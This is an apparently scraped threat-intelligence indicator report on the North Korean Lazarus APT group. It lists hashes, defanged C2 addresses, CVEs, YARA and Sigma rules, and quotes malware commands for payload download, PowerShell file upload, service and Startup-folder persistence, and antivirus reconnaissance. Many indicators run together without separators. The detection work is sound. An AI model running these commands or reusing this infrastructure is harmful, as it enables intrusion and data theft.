This report provides an analysis of Lazarus, an Advanced Persistent Threat (APT) group, focusing on indicators observed in campaigns, discovered malware samples, tools, and their targeted industries. The findings are based on data sourced from open intelligence and cybersecurity research. It is not an in-depth analysis of Lazarus tactics and tools but a collection of indicators to help identify similar activity, focusing on recent operations.
Lazarus is a North Korean Advanced Persistent Threat (APT) group that has been active since 2009. North Korean cyber groups often share infrastructure, code, and resources. As a result, Lazarus is linked to clusters such as Bluenoroff, Andariel, TEMP.Hermit, and Kimsuky.
North Korea
Espionage
2009
Python Scripts in Attacks Group-IB Report
Python Scripts in Attacks Group-IB Report
d502f822e6c52345227b64e3c326e2dbefdd8fc3f844df0821598f8d3732f763 a87b6664b718a9985267f9670e10339372419b320aa3d3da350f9f71dff35dd1Python Scripts in Attacks Group-IB Report
7180f5a1c2554b77b4c21a727cca65cc0f9f023f6cac05b295d7172dad07023f306adab1769c48e09e5a637c82b6b32cd57e4895cc727860f02b558f406e7f34 7f13ca9848086e3de9be971ea8d44ea97ec289c4565ce35b0049c8b534fccbef 01b7306554f6e6bac63f5524588ff5c880b5afb4394074d1c132ecc554c72c83 2f86acdfdf19c1719189fb121cc9391453d83989aa5c07d4144c9fb6585610ccUnit42: North Korean Campaigns Targeting Job Hunters
SHA-256:: 92aeea4c32013b935cd8550a082aff1014d0cd2c2b7d861b43a344de83b68129
Sample: ANY.RUN
SHA-256:: 35434e903bc3be183fa07b9e99d49c0b0b3d8cf6cbd383518e9a9d753d25b672
SHA-256:: 305de20b24e2662d47f06f16a5998ef933a5f8e92f9ecadf82129b484769bbac
SHA-256:: 39e7f94684129efce4d070d89e27508709f95fa55d9721f7b5d52f8b66b95ceb
SHA-256:: ab198c5a79cd9dedb271bd8a56ab568fbd91984f269f075d8b65173e749a8fde
SHA-256:: 444f56157dfcf9fc2347911a00fe9f3e3cb7971dccf67e1359d2f99a35aed88e
SHA-256:: 4f50051ae3cb57f10506c6d69d7c9739c90ef21bfb82b14da6f4b407b6febac0
SHA-256:: 276863ee7b250419411b39c8539c31857752e54b53b072dffd0d3669f2914216
SHA-256:: 617c62da1c228ec6d264f89e375e9a594a72a714a9701ed3268aa4742925112b
SHA-256:: c547b80e1026d562ac851be007792ae98ddc1f3f8776741a72035aca3f18d277
SHA-256:: 03185038cad7126663550d2290a14a166494fdd7ab0978b98667d64bda6e27cc
SHA-256:: 2d300410a3edb77b5f1f0ff2aa2d378425d984f15028c35dfad20fc750a6671a
ESET: Lazarus Targets Spanish Aerospace
C136DD71F45EAEF3206BF5C03412195227D15F38E61672B23DBD03FE3B97EE469FA0895ED1F9185DQuietRAT: Insights from Talos Intelligence
The cURL command to immediately deploy the QuiteRAT binary from a malicious URL:
curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe
Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:
C:\windows\system32\cmd.exe /c systeminfo | findstr Logon
C:\windows\system32\cmd.exe /c ipconfig | findstr Suffix
With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"*cmd.exe*/c* systeminfo | findstr *" Or commandLine:"*cmd.exe*/c* ipconfig | findstr *"
Persistence for the implant is achieved by issuing the following command to QuiteRAT:
C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe
With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"*cmd.exe*sc create*start= auto*binPath=*C:\\Users\\"
ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6A malicious service is created to establish persistence using the following command, leveraging a misleading name (nsIookup.exe with a capital "i") to evade detection.
sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto DisplayName=Agent Activation Runtime_XXXXXX
Below are some of the commands run by NineRAT for reconnaissance, including checking the OS architecture and listing installed antivirus products:
wmic os get osarchitecture
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName"
SHA-256:: 534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433
Sample: ANY.RUN
SHA-256:: ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4
Sample: ANY.RUN
SHA-256:: 47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30
SHA-256:: f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59
SHA-256:: 5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541
SHA-256:: 82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def
SHA-256: e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f
Sample: ANY.RUN
SHA-256: 9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a
Sample: ANY.RUN
This command is used by BottomLoader to download the next-stage payload from a hardcoded remote URL using a PowerShell command.
powershell Invoke-webrequest -URI <URL> -outfile <file_location_on_system>
With the following TI lookup query, we can search through public tasks and identify this malicious activity.
TI lookup:
commandLine:"powershell Invoke-webrequest -URI*-outfile*"
This command is used to upload a file from the specified file_path to a remote_url using PowerShell.
powershell (New-Object System.Net.WebClient).UploadFile('<file_path>','<remote_url>’)
BottomLoader achieves persistence by placing a “.URL” file in the Startup folder, which, when executed, runs a PowerShell command to download the payload.
echo [InternetShortcut] > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
echo URL="<Remote_URL>" >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
echo IconFile=C:\WINDOWS\system32\SHELL32.dll >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
echo IconIndex=20 >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eeePython Scripts in Attacks Group-IB Report
d502f822e6c52345227b64e3c326e2dbefdd8fc3f844df0821598f8d3732f763a87b6664b718a9985267f9670e10339372419b320aa3d3da350f9f71dff35dd1 7180f5a1c2554b77b4c21a727cca65cc0f9f023f6cac05b295d7172dad07023f306adab1769c48e09e5a637c82b6b32cd57e4895cc727860f02b558f406e7f347f13ca9848086e3de9be971ea8d44ea97ec289c4565ce35b0049c8b534fccbef01b7306554f6e6bac63f5524588ff5c880b5afb4394074d1c132ecc554c72c832f86acdfdf19c1719189fb121cc9391453d83989aa5c07d4144c9fb6585610cc1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069fd9e8fcc5bda88870b12b47cbb1cc8775ccff285f980c4a2b683463b26e36bf0a87b6664b718a9985267f9670e10339372419b320aa3d3da350f9f71dff35dd136cac29ff3c503c2123514ea903836d5ad81067508a8e16f7947e3e675a08670 d502f822e6c52345227b64e3c326e2dbefdd8fc3f844df0821598f8d3732f763 d5c0b89e1dfbe9f5e5b2c3f745af895a36adf772f0b72a22052ae6dfa045cea6 0621d37818c35e2557fdd8a729e50ea662ba518df8ca61a44cc3add5c6deb3cd c0110cb21ae0e7fb5dec83ca90db9e250b47a394662810f230eb621b0728aa97 d801ad1beeab3500c65434da51326d7648a3c54923d794b2411b7b6a2960f31e 000b4a77b1905cabdb59d2b576f6da1b2ef55a0258004e4a9e290e9f41fb6923 24b89c77eaeebd4b02c8e8ab6ad3bd7abaa18893ecd469a6a04eda5e374dd305 b8e69d6a766b9088d650e850a638d7ab7c9f59f4e24e2bc8eac41c380876b0d8 9abf6b93eafb797a3556bea1fe8a3b7311d2864d5a9a3687fce84bc1ec4a428c 0f5f0a3ac843df675168f82021c24180ea22f764f87f82f9f77fe8f0ba0b7132 de6f9e9e2ce58a604fe22a9d42144191cfc90b4e0048dffcc69d696826ff7170 9e3a9dbf10793a27361b3cef4d2c87dbd3662646f4470e5242074df4cb96c6b4 06384aedc3614ee73cc7319e30975fca00d43981b626ba5f2b993a254e20d818 0620a7fa8c6e416d96fe3d3baf4cd925b1a72ce1db8d3eacfb1e10c5fe434962cd13a9c92210ada940a44769874dd6716f85c4e4e9d7323ec5789c7b253d937d dcde59721b78e6797ee7f79c0e19c4a1c5a7806d20cbfa4a6ebb8efca189baf3 9110515c2d5f6f48871f0631f411d55f2f0307286e6678952f5d86abe5ce11a9 ddc4162a71f13cc39519c0f8917b960f3536c47be710bde010bb6e87afe16bc5 c373c4c2922f7ca49e2cf5670052d071b15649164ed32a321b7c6fb1a7f2ca6b b378d389fd31c6cb65fc85ea960b609049c5f97266cafcbfc6d261fa09355cc0 b653153a94c275f8f1156298c905b86943cb2a63c8b2211e65cf2a1a671c98d1 14e52430f1d1fa390973294d50849ee500061758721c8e28424871812d237132 0049e2f4f746aa0ec1713cb83dbf8e30d535c01e7b7f10133ae14da0c6a68d69 23b2df9ae70e592c6d82ee1aa1edd00aee982fc2df859f813224a0c908106789 64b1aca7b36e662132ae60c2d2df6ea5872239d2b2632d88fdf1b1f383e0d446 2ed5e202190df967c06750ba11aa8486c309e21875594a68f3dff3abb01f569d 1be03204709c037378ae96197700148303875a99b8f14838bdabfaceed5693e4 47e876110f5e478a739ca3ad034707c1011c89d3a73a1047d0bfa5359a9cfe4b 2a8c90885a8bea74cfe918f3ac6b939990e5ff25434a8c70f7a67d42e03936bd ce572304131bd7c4fd34c3a919de403007c842d9c225d080b4ac31e7c8da606e 9742da5b33866edb8b280fe10909f3f60bc5bf3a33e918d9889e4552f5ce25e3 301678669e05064d13f1912caae530f0b23f5c83a98352e4b0b53a19128a40cf d8806fb404bf29e4a3941c912cbb48553ad5340e1b7195a94e6abf8d75b9102c 7e378c2f0a92c355473b2e2d25d6df9d075ccf89048f7ab10dd4d30c2243a6b1 a6c9f8c06fdb15de26656e5e490990984634e2c1c05232d3260c29970f9dd6f3 887594f18cdbbae4ceef62572e813810b75c8edfb3c4971097d8f8a74f9f103c 1e5d3ee4c0eb6d67f6bc812cf492c53683962252ddb6ac5285ed251ab4a48ddc d356a0668a0f7827d8041eaebdbc003a5b96fe0d82a353ab802dab31bdc5c323 c19cdedf8f800d2eeccd5094d7d054dcc00a998356eeae822c14a25f0ce400f223.106.253[.]19445.61.129[.]25545.61.130[.]045.61.131[.]21845.61.160[.]1445.61.169[.]18745.140.147[.]20867.203.7[.]17167.203.7[.]24577.37.37[.]8191.92.120[.]13595.164.17[.]24144.172.74[.]48144.172.79[.]23147.124.212[.]89147.124.213[.]11147.124.213[.]29147.124.212[.]146147.124.214[.]129147.124.214[.]131147.124.214[.]237167.88.36[.]13167.88.168[.]152167.88.168[.]24172.86.97[.]80172.86.98[.]143172.86.98[.]240172.86.123[.]35173.211.106[.]101185.235.241[.]208hxxp://23.106.253[.]194:1244hxxp://45.140.147[.]208:54321hxxp://95.164.17[.]24:1224hxxp://185.235.241[.]208:1224hxxp://freeconference[.]iohxxp://mirotalk[.]nethxxp://ipcheck[.]cloudhxxp://regioncheck[.]netQuietRAT: Insights from Talos Intelligence
ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11de3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe146.4.21[.]94109.248.150[.]13108.61.186[.]55hxxp[:]//146.4.21.94/tmp/tmp/comp.dathxxp[:]//146.4.21.94/tmp/tmp/log.phphxxp[:]//146.4.21.94/tmp/tmp/logs.phphxxp[:]//ec2-15-207-207-64.ap-south-1.compute.amazonaws.com/resource/main/rawmail.phphxxp[:]//109.248.150.13/EsaFin.exehxxp[:]//146.4.21.94/boards/boardindex.phphxxp[:]//146.4.21.94/editor/common/cmodF6760FB1F8B019AF2304EA6410001B63A1809F1D3A63477A078CE10E53DFB5639E35D74F93CEFA819D8BADE2030C93D0A010AA57B90915EB7D99EC820CA1723AFE261CD85B05C9EF424FC50290DCE7DFod[.]lkjournalide[.]org38.108.185[.]7938.108.185[.]115172.93.201[.]8823.254.211[.]230'DeTankZone' Campaign SOCRadar Report
7353AB9670133468081305BD442F7691CF2F2C1136F09D9508400546C417833A59A37D7D2BF4CFFE31407EDD286A811D9600B68FE757829E30DA4394AB65A4CCdetankzone[.]comccwaterfall[.]comESET: Lazarus Targets Spanish Aerospace
38736CA46D7FC9B9E5C74D192EEC26F951E45752C273B244EA7DFF20B1D6B1C7FD97F343201984B3E18B9743EC203AB49D3B57FED6DF5A99061F80E0C830B895FB934291507E490280164CC4234929F0bug.restoroad[.]comhurricanepub[.]comturnscor[.]commantis.quick.net[.]plnrfm[.]lkwww.radiographers[.]orgkapata-arkeologi.kemdikbud.go[.]idbarsaji.com[.]mxwww.keewoom.co[.]krkerstpakketten.horesca-meppel[.]nlkittimasszazs[.]hunrfm[.]lk175.207.13[.]23150.192.28[.]29199.188.206[.]7578.11.12[.]13160.153.33[.]19567.225.140[.]4185.51.65[.]233178.251.26[.]6589.187.86[.]21446.105.57[.]169118.98.221[.]14hxxps[:]//www.radiographers[.]org/aboutus/aboutus.phphxxp[:]//bug.restoroad[.]com/admin/view_status.phphxxps[:]//hurricanepub[.]com/include/include.phphxxps[:]//turnscor[.]com/wp-includes/contacts.phphxxp[:]//www.keewoom.co[.]kr/prod_img/201409/prod.phphxxps[:]//kittimasszazs[.]hu/images/virag.phphxxp[:]//barsaji.com[.]mx/src/recaptcha/index.phphxxps[:]//kapata-arkeologi.kemdikbud.go[.]id/pages/payment/payment.phphxxps[:]//nrfm[.]lk/wp-includes/SimplePie/content.phphxxp[:]//mantis.quick.net[.]pl/library/securimage/index.phphxxps[:]//kerstpakketten.horesca-meppel[.]nl/wp-content/plugins/woocommerce/lib.phpNew Supply Chain Attack Campaign Kaspersky Report
54df2984e833ba2854de670cce43b82331af3e7fff79bc48a99b8679ea74b589e6fa116ef2705ecf9677021e5e2f691e88a96f8730b35c7406d57f23bbba734dAe00b0f490b122ebab614d98bb2361f7E89fa6345d06da32f9c8786b651119289cd90dff2d9d56654dbecdcd409e1ef3221.141.3[.]76hxxp://ucware[.]net/skins/PHPMailer-master/index[.]phphxxps://hspje[.]com:80/menu6/teacher_qna[.]asphxxps://yoohannet[.]kr/min/tmp/process/proc[.]phphxxps://safemotors[.]co[.]kr/daumeditor/pages/template/template[.]asphxxps://www[.]happinesscc[.]com/mobile/include/func[.]asphxxp://samwoosystem[.]co[.]kr/board/list/write[.]asphxxps://vnfmal2022[.]com/niabbs5/upload/gongji/index[.]phphxxp://www[.]khmcpharm[.]com/Lib/Modules/HtmlEditor/Util/read[.]cerhxxp://www[.]friendmc[.]com/upload/board/asp20062107[.]asphxxps://www[.]seouldementia[.]or[.]kr/_manage/inc/bbs/jiyeuk1_ok[.]asphxxps://www[.]droof[.]kr/Board/htmlEdit/PopupWin/Editor[.]asphxxps://www[.]healthpro[.]or[.]kr/upload/naver_editor/subview/view[.]inchxxps://mainbiz[.]or[.]kr/include/common[.]asphxxps://www[.]hanlasangjo[.]com/editor/pages/page[.]asphxxps://warevalley[.]com/en/common/include/page_tab[.]asphxxp://www[.]hankooktop[.]com/ko/company/info[.]asphxxps://admin[.]esangedu[.]kr/XPaySample/submit[.]phphxxps://api[.]shw[.]kr/login_admin/member/login_fail[.]phphxxps://www[.]muijae[.]com/daumeditor/pages/template/simple[.]asphxxps://www[.]blastedlevels[.]com/levels4SqR8/measure[.]asphxxps://new-q-cells[.]com/upload/newsletter/cn/frame[.]phphxxp://www[.]vietjetairkorea[.]com/INFO/info[.]asphxxps://swt-keystonevalve[.]com/data/editor/index[.]phphxxps://little-pet[.]com/web/board/skin/default/read[.]phphxxp://ictm[.]or[.]kr/UPLOAD_file/board/free/edit/index[.]phphxxps://pms[.]nninc[.]co[.]kr/app/content/board/inc_list[.]asphxxp://theorigin[.]co[.]kr:443/admin/management/index[.]phphxxps://mainbiz[.]or[.]kr/SmartEditor2/photo_uploader/popup/edit[.]asphxxps://www[.]friendmc[.]com:80/upload/board/asp20062107[.]asphxxp://yoohannet[.]kr/min/tmp/process/proc[.]phphxxps://www[.]seoulanesthesia[.]or[.]kr/mail/mail_211230[.]htmlhxxps://www[.]medric[.]or[.]kr/Controls/Board/certificate[.]cerhxxps://www[.]muijae[.]com/daumeditor/pages/template/template[.]asphxxps://kscmfs[.]or[.]kr/member/handle/log_proc[.]phphxxps://www[.]nonstopexpress[.]com/community/include/index[.]asphxxps://www[.]siriuskorea[.]co[.]kr/mall/community/bbs_read[.]asphxxps://hicar[.]kalo[.]kr/data/rental/Coupon/include/inc[.]asphxxps://kstr[.]radiology[.]or[.]kr/upload/schedule/29431_1687715624[.]inchxxps://pediatrics[.]or[.]kr/PubReader/build_css[.]phpDPRK Targets Blockchain Engineers with KANDYKORN
3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb599402360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1927b3564c1cf884d2a05e1d7bd24362ce8563a1e9b85be776190ab7f8af192f6tp-globa[.]xyz23.254.226[.]90192.119.64[.]43hxxp[:]//tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC27.102.113[].]93185.29.8[.]53155.94.208[.]209162.19.71[.]175201.77.179[.]66hxxp[:]//27.102.113.93/inet.txthxxp[:]//162.19.71.175:7443/sonic/bottom.gifhxxp[:]//201.77.179.66:8082/img/lndex.phphxxp[:]//201.77.179.66:8082/img/images/header/B691646991EBAEEC.gifhxxp[:]//201.77.179.66:8082/img/images/header/7AEBC320998FD5E5.gifCVE-2024-38193CVE-2024-21338QuietRAT: Insights from Talos Intelligence
CVE-2022-47966New Campaign Targets Cryptocurrency via Zero-Day Exploit, SOCRadar Report
CVE-2024-4947Avast GitHub Repository: FudModule YARA Rules
rule fudmodule_v2_sequences
{
meta:
reference = "https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/"
strings:
$s00 = "overwrite pvmode failed. %X"
$s01 = "%s\\temp\\tem1245.tmp"
$s02 = "get NTKernelBase and some DriverBase failed."
$s03 = "ClearVaccineNotifyRoutine failed."
$s04 = "DisableUserEtwSource (%d/%d) passed."
$s05 = "ClearVaccineNetworkFilterRoutine skipped."
$h00 = {65 48 8B 04 25 30 00 00 00 48 8B CB 48 8B 50 60 48 89 13 80 7A 02 01 75 16 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 01 00 00 F0 E9}
$h01 = {48 C7 81 F0 00 00 00 20 01 00 00 48 C7 81 F8 00 00 00 A0 00 00 00 48 C7 81 08 01 00 00 A0 00 00 00 48 C7 81 18 01 00 00 68 00 00 00 48 C7 81 20 01 00 00 40 00 00 00}
$h02 = {05 9F B5 FF FF 83 F8 04 0F 87 ?? ?? ?? ?? 48 C7 81 28 01 00 00 80 10 00 00}
$h03 = {48 A3 08 00 00 80 00 00 00 00 48 8B 43 38 48 8B 4B 60}
$h04 = {C7 45 ?? 65 72 53 69 C7 45 ?? 6C 6F 4E 61 66 C7 45 ?? 6D 65 C6 45 ?? 00 66 C7 45 ?? 48 8D}
$h05 = {66 C7 45 ?? 4C 8B C6 45 ?? 3D 66 C7 45 ?? 48 8D C6 45 ?? 05 C7 45 ?? 46 6C 74 45 C7 45 ?? 6E 75 6D 65}
condition:
2 of them
}
Avast GitHub Repository: FudModule YARA Rules
rule fudmodule_v3_sequences
{
meta:
author = "Luigino Camastra, GenDigital"
reference = "https://www.gendigital.com/blog/preview/lazarus-fudmodule"
strings:
$s00 = "Success." // 0x14001acf0
$s01 = "remote_exec failed." // 0x14001ad00
$s02 = "init_env failed." // 0x14001ac90
$s03 = "GetGodMode failed" // 0x14001acc0
$s04 = "RemoteDllExecute passed." // 0x14001b268
$s05 = "CreateRemoteProcess passed." // 0x14001b220
$s06 = "GetSystemHandle passed." // 0x14001b208
$s07 = "SuspendDefender skipped." // 0x14001b1b8
$s08 = "DisableUserEtwSource (%d/%d) passed." // 0x14001b180
$s09 = "EtwpHostSiloState is Null." // 0x14001b140
$s10 = "Get EtwpHostSiloState failed." // 0x14001b160
$h00 = { 8A 44 0E ?? 41 32 C4 88 01 B0 0D 48 FF C1 41 F6 }
$h01 = { 4? 8B DF 4? 8D 47 D0 4? C1 E0 10 4? C1 E3 10 4? }
$h02 = { B? 05 00 00 00 4? 81 E3 FF FF 0F 00 4? 33 D8 4C }
condition:
3 of them
}
rule MAL_Gopuram_Apr23 {
meta:
description = "Detects Lazarus Gopuram malware"
reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
author = "Arnim Rupp (https://github.com/ruppde)"
date = "2023-04-04"
hash = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
hash = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
id = "e0bb43b0-542b-5c8e-bcba-0326f80efaa0"
strings:
// VTgrep content:"%s.TxR.0.regtrans-ms" hits only the 2 hashes above
$path = "%s.TxR.0.regtrans-ms"
condition:
uint16(0) == 0x5A4D and $path and filesize < 10MB
}
SigmaHQ: Rule for Lazarus Side-Loading Activity
title: Lazarus APT DLL Sideloading Activity
id: 24007168-a26b-4049-90d0-ce138e13a5cf
status: test
description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
references:
- https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
- https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-18
tags:
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1574.001
- attack.t1574.002
- attack.g0032
- detection.emerging-threats
logsource:
product: windows
category: image_load
detection:
selection_mscoree:
Image: 'C:\ProgramShared\PresentationHost.exe'
ImageLoaded: ':\ProgramShared\mscoree.dll'
selection_colorui:
Image: 'C:\ProgramData\Adobe\colorcpl.exe'
ImageLoaded: 'C:\ProgramData\Adobe\colorui.dll'
selection_mapistub:
Image: 'C:\ProgramData\Oracle\Java\fixmapi.exe'
ImageLoaded: 'C:\ProgramData\Oracle\Java\mapistub.dll'
selection_hid:
Image: 'C:\ProgramData\Adobe\ARM\tabcal.exe'
ImageLoaded: 'C:\ProgramData\Adobe\ARM\HID.dll'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high